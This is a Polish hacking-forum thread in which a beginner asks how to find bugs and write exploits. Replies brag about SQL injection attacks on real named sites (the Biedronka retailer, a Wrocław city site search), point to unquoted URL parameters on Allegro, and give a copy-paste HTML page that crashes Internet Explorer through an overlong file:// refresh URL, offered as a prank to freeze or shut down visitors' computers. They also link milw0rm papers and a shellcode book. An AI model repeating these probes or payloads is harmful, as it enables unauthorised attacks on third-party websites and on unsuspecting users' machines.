jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)
Printable View
jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)
Drogi MaxHack...
Jak chcesz to robić to obserwuj inne błędy...
Przydałaby się wiedza na temat: HTML, PHP, MySQL
1. Np. na Allegro brak cudzysłowów w adresach daje możliwości, które potem możemy dalej badać...
2. Na niektórych CMS-ach czy stronach dane wprowadzone w adres - np. http://www.jakistamadres.com/blad.ph...KEDHACKEHACKED wywoła wyświetlenie dowolnego tekstu
3. SQLInjection - dla początkujących - metoda prób i błędów - np. mam zapisane jak na stronie Biedronki wykonałem atak SQLInjection i wyskoczyło kilka przydatnych informacji :)
4. Błędy w IE :D Jak tkoś używa IE to jego sprawa... Ale to kwestia 5 minut i 10 linijek kody, aby wykryć dzirę typu "Stack Overflow", zawiechy IE czy wyłączenie komuś kompa... Ciekawy jest efekt - odwiedzasz strone a nagle wyłącza Ci się komp :D
Może potem Ci zapodam kilka skryptów (czysty HTML) na IE :)
Tutaj masz prosty skopiowany z hackme bo to na początek wystarczy:
zapisz to sobie jako zawiecha.html i odpal pod IE... Efekt taki sobie...Kod html:<META HTTP-EQUIV="Refresh" CONTENT="0;URL=file://test/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA5Z̬AAAAAAAAAAAAAAAAAAAAAAACCCCCSSSŞ- #§¬HP+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /">
<HTML>Thx for using Internet Explorer 5.0</HTML>
Potem dam coś lepszego... To nie jest jeszcze exploit, ale kombinując z tym możesz dokonać w przyszłości wiele ;]
Jeszcze dam Ci linka do mojej ulubionej chodź niezwykle prostej: http://1tbzs6sjz.yoyo.pl/crash-ie.html
Pozdrawiam
Było juz a forum ale przychylam sie do wypowiedzi Amidamaru:D A ponadto przydałby się C, VBS itp.
A co do błędów sql to na cyber crime jest opisany błąd sqlinjection - po wpisaniu na Wrocła.Plw wyszukiwarce
Wskoczy ci parę linijek tekstu:DKod:'
jak wykrywac ... zdecydowanie fuzzing (chyba ze masz źródła).Cytat:
Napisał maxhack
// Jak pisać http://milw0rm.com/papers/ u str0ke-a zawsze i na temat ;)
http://helion.pl/ksiazki/shell.htm
Tutaj masz wszystko dokładnie opisane.
Copyright © 2006-2022 - HACK.pl. Wszelkie prawa zastrzeżone.